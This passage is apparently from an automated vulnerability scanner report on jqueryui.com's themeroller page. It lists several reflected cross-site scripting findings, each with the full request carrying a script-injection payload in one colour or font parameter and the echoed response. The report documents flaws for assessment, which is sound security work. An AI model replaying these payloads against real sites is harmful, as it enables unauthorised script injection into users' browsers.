=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcHeader" id="fcHeader" class="hex" value="ffffff930d9\\\"><script>alert(1)</script>3137f1e3c01" size="6" />
...[SNIP]...

1.162. http://jqueryui.com/themeroller/_rollyourown.php [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f7f"><script>alert(1)</script>9fa6ce8b5b8 was submitted in the fcHighlight parameter. This input was echoed as d7f7f\\\"><script>alert(1)</script>9fa6ce8b5b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1fd7f7f"><script>alert(1)</script>9fa6ce8b5b8&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcHighlight" id="fcHighlight" class="hex" value="1f1f1fd7f7f\\\"><script>alert(1)</script>9fa6ce8b5b8" size="6" />
...[SNIP]...

1.163. http://jqueryui.com/themeroller/_rollyourown.php [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0ba1"><script>alert(1)</script>88118119e1e was submitted in the fcHover parameter. This input was echoed as c0ba1\\\"><script>alert(1)</script>88118119e1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00c0ba1"><script>alert(1)</script>88118119e1e&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcHover" id="fcHover" class="hex" value="381f00c0ba1\\\"><script>alert(1)</script>88118119e1e" size="6" />
...[SNIP]...

1.164. http://jqueryui.com/themeroller/_rollyourown.php [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d332"><script>alert(1)</script>12a346ef725 was submitted in the ffDefault parameter. This input was echoed as 3d332\\\"><script>alert(1)</script>12a346ef725 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif3d332"><script>alert(1)</script>12a346ef725&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:19 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif3d332%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E12a346ef725%26fwDefault%3Dbo
...[SNIP]...
<input type="text" name="ffDefault" id="ffDefault" class="ffDefault" value="Segoe UI, Arial, sans-serif3d332\\\"><script>alert(1)</script>12a346ef725" size="8" />
...[SNIP]...

1.165. http://jqueryui.com/themeroller/_rollyourown.php [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f2bd"><script>alert(1)</script>3c85cbdd759 was submitted in the fsDefault parameter. This input was echoed as 1f2bd\\\"><script>alert(1)</script>3c85cbdd759 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em1f2bd"><script>alert(1)</script>3c85cbdd759&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em1f2bd%22%3E%3Cscript%3Ealert%281%29%3C%
...[SNIP]...
<input type="text" name="fsDefault" id="fsDefault" class="fsDefault" value="1.1em1f2bd\\\"><script>alert(1)</script>3c85cbdd759" size="3" />
...[SNIP]...

1.166. http://jqueryui.com/themeroller/_rollyourown.php [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac817"><script>alert(1)</script>fb276a0769b was submitted in the iconColorActive parameter. This input was echoed as ac817\\\"><script>alert(1)</script>fb276a0769b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990fac817"><script>alert(1)</script>fb276a0769b&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorActive" id="iconColorActive" class="hex" value="eb990fac817\\\"><script>alert(1)</script>fb276a0769b" size="6" />
...[SNIP]...

1.167. http://jqueryui.com/themeroller/_rollyourown.php [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36cec"><script>alert(1)</script>eae2f93adaf was submitted in the iconColorContent parameter. This input was echoed as 36cec\\\"><script>alert(1)</script>eae2f93adaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d1940536cec"><script>alert(1)</script>eae2f93adaf&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
